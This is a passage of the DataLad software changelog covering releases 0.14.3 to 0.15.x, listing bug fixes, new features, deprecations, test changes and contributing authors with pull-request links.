([@yarikoptic](https://github.com/yarikoptic) [@bpoldrack](https://github.com/bpoldrack))\n- Fix invalid escape sequences [#6293](https://github.com/datalad/datalad/pull/6293) ([@jwodder](https://github.com/jwodder))\n- CI: Update environment for windows CI builds [#6292](https://github.com/datalad/datalad/pull/6292) ([@bpoldrack](https://github.com/bpoldrack))\n- bump the python version used for mac os tests [#6288](https://github.com/datalad/datalad/pull/6288) ([@christian-monch](https://github.com/christian-monch) [@bpoldrack](https://github.com/bpoldrack))\n- ENH(UX): log a hint to use ulimit command in case of \"Too long\" exception [#6173](https://github.com/datalad/datalad/pull/6173) ([@yarikoptic](https://github.com/yarikoptic))\n- Report correct HTTP URL for RIA store content [#6091](https://github.com/datalad/datalad/pull/6091) ([@mih](https://github.com/mih))\n- BF: Don't overwrite subdataset source candidates [#6168](https://github.com/datalad/datalad/pull/6168) ([@bpoldrack](https://github.com/bpoldrack))\n- Bump sphinx requirement to bypass readthedocs defaults [#6189](https://github.com/datalad/datalad/pull/6189) ([@mih](https://github.com/mih))\n- infra: Provide custom prefix to auto-related labels [#6151](https://github.com/datalad/datalad/pull/6151) ([@adswa](https://github.com/adswa))\n- Remove all usage of exc_str() [#6142](https://github.com/datalad/datalad/pull/6142) ([@mih](https://github.com/mih))\n- BF: obtain information about annex special remotes also from annex journal [#6135](https://github.com/datalad/datalad/pull/6135) ([@yarikoptic](https://github.com/yarikoptic) [@mih](https://github.com/mih))\n- BF: clone tried to save new subdataset despite failing to clone [#6140](https://github.com/datalad/datalad/pull/6140) ([@bpoldrack](https://github.com/bpoldrack))\n\n#### 🧪 Tests\n\n- RF+BF: use skip_if_no_module helper instead of try/except for libxmp and boto [#6148](https://github.com/datalad/datalad/pull/6148) ([@yarikoptic](https://github.com/yarikoptic))\n- git://github.com -> https://github.com [#6134](https://github.com/datalad/datalad/pull/6134) ([@mih](https://github.com/mih))\n\n#### Authors: 6\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.3 (Sat Oct 30 2021)\n\n#### 🐛 Bug Fix\n\n- BF: Don't make create-sibling recursive by default [#6116](https://github.com/datalad/datalad/pull/6116) ([@adswa](https://github.com/adswa))\n- BF: Add dashes to 'force' option in non-empty directory error message [#6078](https://github.com/datalad/datalad/pull/6078) ([@DisasterMo](https://github.com/DisasterMo))\n- DOC: Add supported URL types to download-url's docstring [#6098](https://github.com/datalad/datalad/pull/6098) ([@adswa](https://github.com/adswa))\n- BF: Retain git-annex error messages & don't show them if operation successful [#6070](https://github.com/datalad/datalad/pull/6070) ([@DisasterMo](https://github.com/DisasterMo))\n- Remove uses of `__full_version__` and `datalad.version` [#6073](https://github.com/datalad/datalad/pull/6073) ([@jwodder](https://github.com/jwodder))\n- BF: ORA shouldn't crash while handling a failure [#6063](https://github.com/datalad/datalad/pull/6063) ([@bpoldrack](https://github.com/bpoldrack))\n- DOC: Refine --reckless docstring on usage and wording [#6043](https://github.com/datalad/datalad/pull/6043) ([@adswa](https://github.com/adswa))\n- BF: archives upon strip - use rmtree which retries etc instead of rmdir [#6064](https://github.com/datalad/datalad/pull/6064) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not leave test in a tmp dir destined for removal [#6059](https://github.com/datalad/datalad/pull/6059) ([@yarikoptic](https://github.com/yarikoptic))\n- Next wave of exc_str() removals [#6022](https://github.com/datalad/datalad/pull/6022) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- CI: Enable new codecov uploader in Appveyor CI ([@adswa](https://github.com/adswa))\n\n#### 🏠 Internal\n\n- UX: Log clone-candidate number and URLs [#6092](https://github.com/datalad/datalad/pull/6092) ([@adswa](https://github.com/adswa))\n- UX/ENH: Disable reporting, and don't do superfluous internal subdatasets calls [#6094](https://github.com/datalad/datalad/pull/6094) ([@adswa](https://github.com/adswa))\n- Update codecov action to v2 [#6072](https://github.com/datalad/datalad/pull/6072) ([@jwodder](https://github.com/jwodder))\n\n#### 📝 Documentation\n\n- Design document on URL substitution feature [#6065](https://github.com/datalad/datalad/pull/6065) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- BF(TST): remove reuse of the same tape across unrelated tests [#6127](https://github.com/datalad/datalad/pull/6127) ([@yarikoptic](https://github.com/yarikoptic))\n- Fail Travis tests on deprecation warnings [#6074](https://github.com/datalad/datalad/pull/6074) ([@jwodder](https://github.com/jwodder))\n- Ux get result handling broken [#6052](https://github.com/datalad/datalad/pull/6052) ([@christian-monch](https://github.com/christian-monch))\n- enable metalad tests again [#6060](https://github.com/datalad/datalad/pull/6060) ([@christian-monch](https://github.com/christian-monch))\n\n#### Authors: 7\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Burgardt ([@DisasterMo](https://github.com/DisasterMo))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.2 (Wed Oct 06 2021)\n\n#### 🐛 Bug Fix\n\n- BF: Don't suppress datalad subdatasets output [#6035](https://github.com/datalad/datalad/pull/6035) ([@DisasterMo](https://github.com/DisasterMo) [@mih](https://github.com/mih))\n- Honor datalad.runtime.use-patool if set regardless of OS (was Windows only) [#6033](https://github.com/datalad/datalad/pull/6033) ([@mih](https://github.com/mih))\n- Discontinue usage of deprecated (public) helper [#6032](https://github.com/datalad/datalad/pull/6032) ([@mih](https://github.com/mih))\n- BF: ProgressHandler - close the other handler if was specified [#6020](https://github.com/datalad/datalad/pull/6020) ([@yarikoptic](https://github.com/yarikoptic))\n- UX: Report GitLab weburl of freshly created projects in the result [#6017](https://github.com/datalad/datalad/pull/6017) ([@adswa](https://github.com/adswa))\n- Ensure there's a blank line between the class `__doc__` and \"Parameters\" in `build_doc` docstrings [#6004](https://github.com/datalad/datalad/pull/6004) ([@jwodder](https://github.com/jwodder))\n- Large code-reorganization of everything runner-related [#6008](https://github.com/datalad/datalad/pull/6008) ([@mih](https://github.com/mih))\n- Discontinue exc_str() in all modern parts of the code base [#6007](https://github.com/datalad/datalad/pull/6007) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- TST: Add test to ensure functionality with subdatasets starting with a hyphen (-) [#6042](https://github.com/datalad/datalad/pull/6042) ([@DisasterMo](https://github.com/DisasterMo))\n- BF(TST): filter away warning from coverage from analysis of stderr of --help [#6028](https://github.com/datalad/datalad/pull/6028) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: disable outdated SSL root certificate breaking chain on older/buggy clients [#6027](https://github.com/datalad/datalad/pull/6027) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: start global test_http_server only if not running already [#6023](https://github.com/datalad/datalad/pull/6023) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Burgardt ([@DisasterMo](https://github.com/DisasterMo))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.1 (Fri Sep 24 2021)\n\n#### 🐛 Bug Fix\n\n- BF: downloader - fail to download even on non-crippled FS if symlink exists [#5991](https://github.com/datalad/datalad/pull/5991) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: import datalad.api to bind extensions methods for discovery of dataset methods [#5999](https://github.com/datalad/datalad/pull/5999) ([@yarikoptic](https://github.com/yarikoptic))\n- Restructure cmdline API presentation [#5988](https://github.com/datalad/datalad/pull/5988) ([@mih](https://github.com/mih))\n- Close file descriptors after process exit [#5983](https://github.com/datalad/datalad/pull/5983) ([@mih](https://github.com/mih))\n\n#### ⚠️ Pushed to `maint`\n\n- Discontinue testing of hirni extension ([@mih](https://github.com/mih))\n\n#### 🏠 Internal\n\n- Add debugging information to release step [#5980](https://github.com/datalad/datalad/pull/5980) ([@jwodder](https://github.com/jwodder))\n\n#### 📝 Documentation\n\n- Coarse description of the credential subsystem's functionality [#5998](https://github.com/datalad/datalad/pull/5998) ([@mih](https://github.com/mih))\n\n#### 🧪 Tests\n\n- BF(TST): use sys.executable, mark test_ria_basics.test_url_keys as requiring network [#5986](https://github.com/datalad/datalad/pull/5986) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 3\n\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.0 (Tue Sep 14 2021) -- We miss you Kyle!\n\n#### Enhancements and new features\n\n- Command execution is now performed by a new `Runner` implementation that is\n no longer based on the `asyncio` framework, which was found to exhibit\n fragile performance in interaction with other `asyncio`-using code, such as\n Jupyter notebooks. The new implementation is based on threads. It also supports\n the specification of \"protocols\" that were introduced with the switch to the\n `asyncio` implementation in 0.14.0. ([#5667][]) \n\n- `clone` now supports arbitrary URL transformations based on regular\n expressions. One or more transformation steps can be defined via\n `datalad.clone.url-substitute.<label>` configuration settings. The feature can\n be (and is now) used to support convenience mappings, such as\n `https://osf.io/q8xnk/` (displayed in a browser window) to `osf://q8xnk`\n (clonable via the `datalad-osf` extension. ([#5749][])\n\n- Homogenize SSH use and configurability between DataLad and git-annex, by\n instructing git-annex to use DataLad's `sshrun` for SSH calls (instead of SSH\n directly). ([#5389][])\n\n- The ORA special remote has received several new features:\n\n - It now support a `push-url` setting as an alternative to `url` for write\n access. An analog parameter was also added to `create-sibling-ria`.\n ([#5420][], [#5428][])\n\n - Access of RIA stores now performs homogeneous availability checks,\n regardless of access protocol. Before, broken HTTP-based access due to\n misspecified URLs could have gone unnoticed. ([#5459][], [#5672][])\n\n - Error reporting was introduce to inform about undesirable conditions in\n remote RIA stores. ([#5683][])\n\n- `create-sibling-ria` now supports `--alias` for the specification of a\n convenience dataset alias name in a RIA store. ([#5592][])\n\n- Analog to `git commit`, `save` now features an `--amend` mode to support\n incremental updates of a dataset state. ([#5430][])\n\n- `run` now supports a dry-run mode that can be used to inspect the result of\n parameter expansion on the effective command to ease the composition of more\n complicated command lines. ([#5539][])\n\n- `run` now supports a `--assume-ready` switch to avoid the (possibly\n expensive) preparation of inputs and outputs with large datasets that have\n already been readied through other means. ([#5431][])\n\n- `update` now features `--how` and `--how-subds` parameters to configure how\n an update shall be performed. Supported modes are `fetch` (unchanged\n default), and `merge` (previously also possible via `--merge`), but also new\n strategies like `reset` or `checkout`. ([#5534][])\n\n- `update` has a new `--follow=parentds-lazy` mode that only performs a fetch\n operation in subdatasets when the desired commit is not yet present. During\n recursive updates involving many subdatasets this can substantially speed up\n performance. ([#5474][])\n\n- DataLad's command line API can now report the version for individual commands\n via `datalad <cmd> --version`. The output has been homogenized to\n `<providing package> <version>`. ([#5543][])\n\n- `create-sibling` now logs information on an auto-generated sibling name, in\n the case that no `--name/-s` was provided. ([#5550][])\n\n- `create-sibling-github` has been updated to emit result records like any\n standard DataLad command. Previously it was implemented as a \"plugin\", which\n did not support all standard API parameters. ([#5551][])\n\n- `copy-file` now also works with content-less files in datasets on crippled\n filesystems (adjusted mode), when a recent enough git-annex (8.20210428 or\n later) is available. ([#5630][])\n\n- `addurls` can now be instructed how to behave in the event of file name\n collision via a new parameter `--on-collision`. ([#5675][])\n\n- `addurls` reporting now informs which particular subdatasets were created.\n ([#5689][])\n\n- Credentials can now be provided or overwritten via all means supported by\n `ConfigManager`. Importantly, `datalad.credential.<name>.<field>`\n configuration settings and analog specification via environment variables are\n now supported (rather than custom environment variables only). Previous\n specification methods are still supported too. ([#5680][])\n\n- A new `datalad.credentials.force-ask` configuration flag can now be used to\n force re-entry of already known credentials. This simplifies credential\n updates without having to use an approach native to individual credential\n stores. ([#5777][])\n\n- Suppression of rendering repeated similar results is now configurable via the\n configuration switches `datalad.ui.suppress-similar-results` (bool), and\n `datalad.ui.suppress-similar-results-threshold` (int). ([#5681][])\n\n- The performance of `status` and similar functionality when determining local\n file availability has been improved. ([#5692][])\n\n- `push` now renders a result summary on completion. ([#5696][])\n\n- A dedicated info log message indicates when dataset repositories are\n subjected to an annex version upgrade. ([#5698][])\n\n- Error reporting improvements:\n\n - The `NoDatasetFound` exception now provides information for which purpose a\n dataset is required. ([#5708][])\n\n - Wording of the `MissingExternalDependeny` error was rephrased to account\n for cases of non-functional installations. ([#5803][])\n\n - `push` reports when a `--to` parameter specification was (likely)\n forgotten. ([#5726][])\n\n - Detailed information is now given when DataLad fails to obtain a lock for\n credential entry in a timely fashion. Previously only a generic debug log\n message was emitted. ([#5884][])\n\n - Clarified error message when `create-sibling-gitlab` was called without\n `--project`. ([#5907][])\n\n- `add-readme` now provides a README template with more information on the\n nature and use of DataLad datasets. A README file is no longer annex'ed by\n default, but can be using the new `--annex` switch. ([#5723][], [#5725][])\n\n- `clean` now supports a `--dry-run` mode to inform about cleanable content.\n ([#5738][])\n\n- A new configuration setting `datalad.locations.locks` can be used to control\n the placement of lock files. ([#5740][])\n\n- `wtf` now also reports branch names and states. ([#5804][])\n\n- `AnnexRepo.whereis()` now supports batch mode. ([#5533][])\n\n### Deprecations and removals\n\n- The minimum supported git-annex version is now 8.20200309. ([#5512][])\n\n- ORA special remote configuration items `ssh-host`, and `base-path` are\n deprecated. They are completely replaced by `ria+<protocol>://` URL\n specifications. ([#5425][])\n\n- The deprecated `no_annex` parameter of `create()` was removed from the Python\n API. ([#5441][])\n\n- The unused `GitRepo.pull()` method has been removed. ([#5558][])\n\n- Residual support for \"plugins\" (a mechanism used before DataLad supported\n extensions) was removed. This includes the configuration switches\n `datalad.locations.{system,user}-plugins`. ([#5554][], [#5564][])\n\n- Several features and comments have been moved to the `datalad-deprecated`\n package. This package must now be installed to be able to use keep using this\n functionality.\n\n - The `publish` command. Use `push` instead. ([#5837][])\n\n - The `ls` command. ([#5569][])\n\n - The web UI that is deployable via `datalad create-sibling --ui`. ([#5555][])\n\n - The \"automagic IO\" feature. ([#5577][])\n\n- `AnnexRepo.copy_to()` has been deprecated. The `push` command should be used\n instead. ([#5560][])\n\n- `AnnexRepo.sync()` has been deprecated. `AnnexRepo.call_annex(['sync', ...])`\n should be used instead. ([#5461][])\n\n- All `GitRepo.*_submodule()` methods have been deprecated and will be removed\n in a future release. ([#5559][])\n\n- `create-sibling-github`'s `--dryrun` switch was deprecated, use `--dry-run` instead.\n ([#5551][])\n\n- The `datalad --pbs-runner` option has been deprecated, use `condor_run`\n (or similar) instead. ([#5956][])\n\n#### 🐛 Fixes\n\n- Prevent invalid declaration of a publication dependencies for 'origin' on any\n auto-detected ORA special remotes, when cloing from a RIA store. An ORA\n remote is now checked whether it actually points to the RIA store the clone was\n made from. ([#5415][])\n\n- The ORA special remote implementation has received several fixes:\n\n - It can now handle HTTP redirects. ([#5792][])\n\n - Prevents failure when URL-type annex keys contain the '/' character.\n ([#5823][])\n\n - Properly support the specification of usernames, passwords and ports in\n `ria+<protocol>://` URLs. ([#5902][])\n\n- It is now possible to specifically select the default (or generic) result\n renderer via `datalad -f default` and with that override a `tailored` result\n renderer that may be preconfigured for a particular command. ([#5476][])\n\n- Starting with 0.14.0, original URLs given to `clone` were recorded in a\n subdataset record. This was initially done in a second commit, leading to\n inflation of commits and slowdown in superdatasets with many subdatasets. Such\n subdataset record annotation is now collapsed into a single commits.\n ([#5480][]) \n\n- `run` now longer removes leading empty directories as part of the output\n preparation. This was surprising behavior for commands that do not ensure on\n their own that output directories exist. ([#5492][])\n\n- A potentially existing `message` property is no longer removed when using the\n `json` or `json_pp` result renderer to avoid undesired withholding of\n relevant information. ([#5536][])\n\n- `subdatasets` now reports `state=present`, rather than `state=clean`, for\n installed subdatasets to complement `state=absent` reports for uninstalled\n dataset. ([#5655][])\n\n- `create-sibling-ria` now executes commands with a consistent environment\n setup that matches all other command execution in other DataLad commands.\n ([#5682][])\n\n- `save` no longer saves unspecified subdatasets when called with an explicit\n path (list). The fix required a behavior change of\n `GitRepo.get_content_info()` in its interpretation of `None` vs. `[]` path\n argument values that now aligns the behavior of `GitRepo.diff|status()` with\n their respective documentation. ([#5693][])\n\n- `get` now prefers the location of a subdatasets that is recorded in a\n superdataset's `.gitmodules` record. Previously, DataLad tried to obtain a\n subdataset from an assumed checkout of the superdataset's origin. This new\n default order is (re-)configurable via the\n `datalad.get.subdataset-source-candidate-<priority-label>` configuration\n mechanism. ([#5760][])\n\n- `create-sibling-gitlab` no longer skips the root dataset when `.` is given as\n a path. ([#5789][])\n\n- `siblings` now rejects a value given to `--as-common-datasrc` that clashes\n with the respective Git remote. ([#5805][])\n\n- The usage synopsis reported by `siblings` now lists all supported actions.\n ([#5913][])\n\n- `siblings` now renders non-ok results to avoid silent failure. ([#5915][])\n\n- `.gitattribute` file manipulations no longer leave the file without a\n trailing newline. ([#5847][])\n\n- Prevent crash when trying to delete a non-existing keyring credential field.\n ([#5892][])\n\n- git-annex is no longer called with an unconditional `annex.retry=3`\n configuration. Instead, this parameterization is now limited to `annex get`\n and `annex copy` calls. ([#5904][])\n\n#### 🧪 Tests\n\n- `file://` URLs are no longer the predominant test case for `AnnexRepo`\n functionality. A built-in HTTP server now used in most cases. ([#5332][])\n\n---\n\n# 0.14.8 (Sun Sep 12 2021)\n\n#### 🐛 Bug Fix\n\n- BF: add-archive-content on .xz and other non-.gz stream compressed files [#5930](https://github.com/datalad/datalad/pull/5930) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(UX): do not keep logging ERROR possibly present in progress records [#5936](https://github.com/datalad/datalad/pull/5936) ([@yarikoptic](https://github.com/yarikoptic))\n- Annotate datalad_core as not needing actual data -- just uses annex whereis [#5971](https://github.com/datalad/datalad/pull/5971) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: limit CMD_MAX_ARG if obnoxious value is encountered. [#5945](https://github.com/datalad/datalad/pull/5945) ([@yarikoptic](https://github.com/yarikoptic))\n- Download session/credentials locking -- inform user if locking is \"failing\" to be obtained, fail upon ~5min timeout [#5884](https://github.com/datalad/datalad/pull/5884) ([@yarikoptic](https://github.com/yarikoptic))\n- Render siblings()'s non-ok results with the default renderer [#5915](https://github.com/datalad/datalad/pull/5915) ([@mih](https://github.com/mih))\n- BF: do not crash, just skip whenever trying to delete non existing field in the underlying keyring [#5892](https://github.com/datalad/datalad/pull/5892) ([@yarikoptic](https://github.com/yarikoptic))\n- Fix argument-spec for `siblings` and improve usage synopsis [#5913](https://github.com/datalad/datalad/pull/5913) ([@mih](https://github.com/mih))\n- Clarify error message re unspecified gitlab project [#5907](https://github.com/datalad/datalad/pull/5907) ([@mih](https://github.com/mih))\n- Support username, password and port specification in RIA URLs [#5902](https://github.com/datalad/datalad/pull/5902) ([@mih](https://github.com/mih))\n- BF: take path from SSHRI, test URLs not only on Windows [#5881](https://github.com/datalad/datalad/pull/5881) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX): warn user if keyring returned a \"null\" keyring [#5875](https://github.com/datalad/datalad/pull/5875) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX): state original purpose in NoDatasetFound exception + detail it for get [#5708](https://github.com/datalad/datalad/pull/5708) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### ⚠️ Pushed to `maint`\n\n- Merge branch 'bf-http-headers-agent' into maint ([@yarikoptic](https://github.com/yarikoptic))\n- RF(BF?)+DOC: provide User-Agent to entire session headers + use those if provided ([@yarikoptic](https://github.com/yarikoptic))\n\n#### 🏠 Internal\n\n- Pass `--no-changelog` to `auto shipit` if changelog already has entry [#5952](https://github.com/datalad/datalad/pull/5952) ([@jwodder](https://github.com/jwodder))\n- Add isort config to match current convention + run isort via pre-commit (if configured) [#5923](https://github.com/datalad/datalad/pull/5923) ([@jwodder](https://github.com/jwodder))\n- .travis.yml: use python -m {nose,coverage} invocations, and always show combined report [#5888](https://github.com/datalad/datalad/pull/5888) ([@yarikoptic](https://github.com/yarikoptic))\n- Add project URLs into the package metadata for convenience links on Pypi [#5866](https://github.com/datalad/datalad/pull/5866) ([@adswa](https://github.com/adswa) [@yarikoptic](https://github.com/yarikoptic))\n\n#### 🧪 Tests\n\n- BF: do use OBSCURE_FILENAME instead of hardcoded unicode [#5944](https://github.com/datalad/datalad/pull/5944) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): Skip testing for having PID listed if no psutil [#5920](https://github.com/datalad/datalad/pull/5920) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): Boost version of git-annex to 8.20201129 to test an error message [#5894](https://github.com/datalad/datalad/pull/5894) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.7 (Tue Aug 03 2021)\n\n#### 🐛 Bug Fix\n\n- UX: When two or more clone URL templates are found, error out more gracefully [#5839](https://github.com/datalad/datalad/pull/5839) ([@adswa](https://github.com/adswa))\n- BF: http_auth - follow redirect (just 1) to re-authenticate after initial attempt [#5852](https://github.com/datalad/datalad/pull/5852) ([@yarikoptic](https://github.com/yarikoptic))\n- addurls Formatter - provide value repr in exception [#5850](https://github.com/datalad/datalad/pull/5850) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH: allow for \"patch\" level semver for \"master\" branch [#5839](https://github.com/datalad/datalad/pull/5839) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: Report info from annex JSON error message in CommandError [#5809](https://github.com/datalad/datalad/pull/5809) ([@mih](https://github.com/mih))\n- RF(TST): do not test for no EASY and pkg_resources in shims [#5817](https://github.com/datalad/datalad/pull/5817) ([@yarikoptic](https://github.com/yarikoptic))\n- http downloaders: Provide custom informative User-Agent, do not claim to be \"Authenticated access\" [#5802](https://github.com/datalad/datalad/pull/5802) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(UX,DX): inform user with a warning if version is 0+unknown [#5787](https://github.com/datalad/datalad/pull/5787) ([@yarikoptic](https://github.com/yarikoptic))\n- shell-completion: add argcomplete to 'misc' extra_depends, log an ERROR if argcomplete fails to import [#5781](https://github.com/datalad/datalad/pull/5781) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH (UX): add python-gitlab dependency [#5776](https://github.com/datalad/datalad/pull/5776) ([email protected])\n\n#### 🏠 Internal\n\n- BF: Fix reported paths in ORA remote [#5821](https://github.com/datalad/datalad/pull/5821) ([@adswa](https://github.com/adswa))\n- BF: import importlib.metadata not importlib_metadata whenever available [#5818](https://github.com/datalad/datalad/pull/5818) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### 🧪 Tests\n\n- TST: set --allow-unrelated-histories in the mk_push_target setup for Windows [#5855](https://github.com/datalad/datalad/pull/5855) ([@adswa](https://github.com/adswa))\n- Tests: Allow for version to contain + as a separator and provide more information for version related comparisons [#5786](https://github.com/datalad/datalad/pull/5786) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 4\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Stephan Heunis ([@jsheunis](https://github.com/jsheunis))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.6 (Sun Jun 27 2021)\n\n#### 🏠 Internal\n\n- BF: update changelog conversion from .md to .rst (for sphinx) [#5757](https://github.com/datalad/datalad/pull/5757) ([@yarikoptic](https://github.com/yarikoptic) [@jwodder](https://github.com/jwodder))\n\n#### Authors: 2\n\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.5 (Mon Jun 21 2021)\n\n#### 🐛 Bug Fix\n\n- BF(TST): parallel - take longer for producer to produce [#5747](https://github.com/datalad/datalad/pull/5747) ([@yarikoptic](https://github.com/yarikoptic))\n- add --on-failure default value and document it [#5690](https://github.com/datalad/datalad/pull/5690) ([@christian-monch](https://github.com/christian-monch) [@yarikoptic](https://github.com/yarikoptic))\n- ENH: harmonize \"purpose\" statements to imperative form [#5733](https://github.com/datalad/datalad/pull/5733) ([@yarikoptic](https://github.com/yarikoptic))\n- ENH(TST): populate heavy tree with 100 unique keys (not just 1) among 10,000 [#5734](https://github.com/datalad/datalad/pull/5734) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: do not use .acquired - just get state from acquire() [#5718](https://github.com/datalad/datalad/pull/5718) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: account for annex now \"scanning for annexed\" instead of \"unlocked\" files [#5705](https://github.com/datalad/datalad/pull/5705) ([@yarikoptic](https://github.com/yarikoptic))\n- interface: Don't repeat custom summary for non-generator results [#5688](https://github.com/datalad/datalad/pull/5688) ([@kyleam](https://github.com/kyleam))\n- RF: just pip install datalad-installer [#5676](https://github.com/datalad/datalad/pull/5676) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: addurls.extract: Drop mention of removed 'stream' parameter [#5690](https://github.com/datalad/datalad/pull/5690) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5674 from kyleam/test-addurls-copy-fix [#5674](https://github.com/datalad/datalad/pull/5674) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5663 from kyleam/status-ds-equal-path [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5671 from kyleam/update-fetch-fail [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- BF: update: Honor --on-failure if fetch fails [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- RF: update: Avoid fetch's deprecated kwargs [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- CLN: update: Drop an unused import [#5671](https://github.com/datalad/datalad/pull/5671) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5664 from kyleam/addurls-better-url-parts-error [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- Merge pull request #5661 from kyleam/sphinx-fix-plugin-refs [#5661](https://github.com/datalad/datalad/pull/5661) ([@kyleam](https://github.com/kyleam))\n- BF: status: Provide special treatment of \"this dataset\" path [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- BF: addurls: Provide better placeholder error for special keys [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: addurls: Simply construction of placeholder exception message [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: addurls._get_placeholder_exception: Rename a parameter [#5664](https://github.com/datalad/datalad/pull/5664) ([@kyleam](https://github.com/kyleam))\n- RF: status: Avoid repeated Dataset.path access [#5663](https://github.com/datalad/datalad/pull/5663) ([@kyleam](https://github.com/kyleam))\n- DOC: Reference plugins via datalad.api [#5661](https://github.com/datalad/datalad/pull/5661) ([@kyleam](https://github.com/kyleam))\n- download-url: Set up datalad special remote if needed [#5648](https://github.com/datalad/datalad/pull/5648) ([@kyleam](https://github.com/kyleam) [@yarikoptic](https://github.com/yarikoptic))\n\n#### ⚠️ Pushed to `maint`\n\n- MNT: Post-release dance ([@kyleam](https://github.com/kyleam))\n\n#### 🏠 Internal\n\n- Switch to versioneer and auto [#5669](https://github.com/datalad/datalad/pull/5669) ([@jwodder](https://github.com/jwodder) [@yarikoptic](https://github.com/yarikoptic))\n- MNT: setup.py: Temporarily avoid Sphinx 4 [#5649](https://github.com/datalad/datalad/pull/5649) ([@kyleam](https://github.com/kyleam))\n\n#### 🧪 Tests\n\n- BF(TST): skip testing for showing \"Scanning for ...\" since not shown if too quick [#5727](https://github.com/datalad/datalad/pull/5727) ([@yarikoptic](https://github.com/yarikoptic))\n- Revert \"TST: test_partial_unlocked: Document and avoid recent git-annex failure\" [#5651](https://github.com/datalad/datalad/pull/5651) ([@kyleam](https://github.com/kyleam))\n\n#### Authors: 4\n\n- Christian Mönch ([@christian-monch](https://github.com/christian-monch))\n- John T. Wodder II ([@jwodder](https://github.com/jwodder))\n- Kyle Meyer ([@kyleam](https://github.com/kyleam))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.14.4 (May 10, 2021) -- .\n\n## Fixes\n\n- Following an internal call to `git-clone`, [clone][] assumed that\n the remote name was \"origin\", but this may not be the case if\n `clone.defaultRemoteName` is configured (available as of Git 2.30).\n ([#5572][])\n\n- Several test fixes, including updates for changes in git-annex.\n ([#5612][]) ([#5632][]) ([#5639][])\n\n\n# 0.14.3 (April 28, 2021) -- .\n\n## Fixes\n\n- For outputs that include a glob, [run][] didn't re-glob after\n executing the command, which is necessary to catch changes if\n `--explicit` or `--expand={outputs,both}` is specified. ([#5594][])\n\n- [run][] now gives an error result rather than a warning when an\n input glob doesn't match. ([#5594][])\n\n- The procedure for creating a RIA store checks for an existing\n ria-layout-version file and makes sure its version matches the\n desired version. This check wasn't done correctly for SSH hosts.\n ([#5607][])\n\n- A helper for transforming git-annex JSON records into DataLad\n results didn't account for the unusual case where the git-annex\n record doesn't have a \"file\" key. 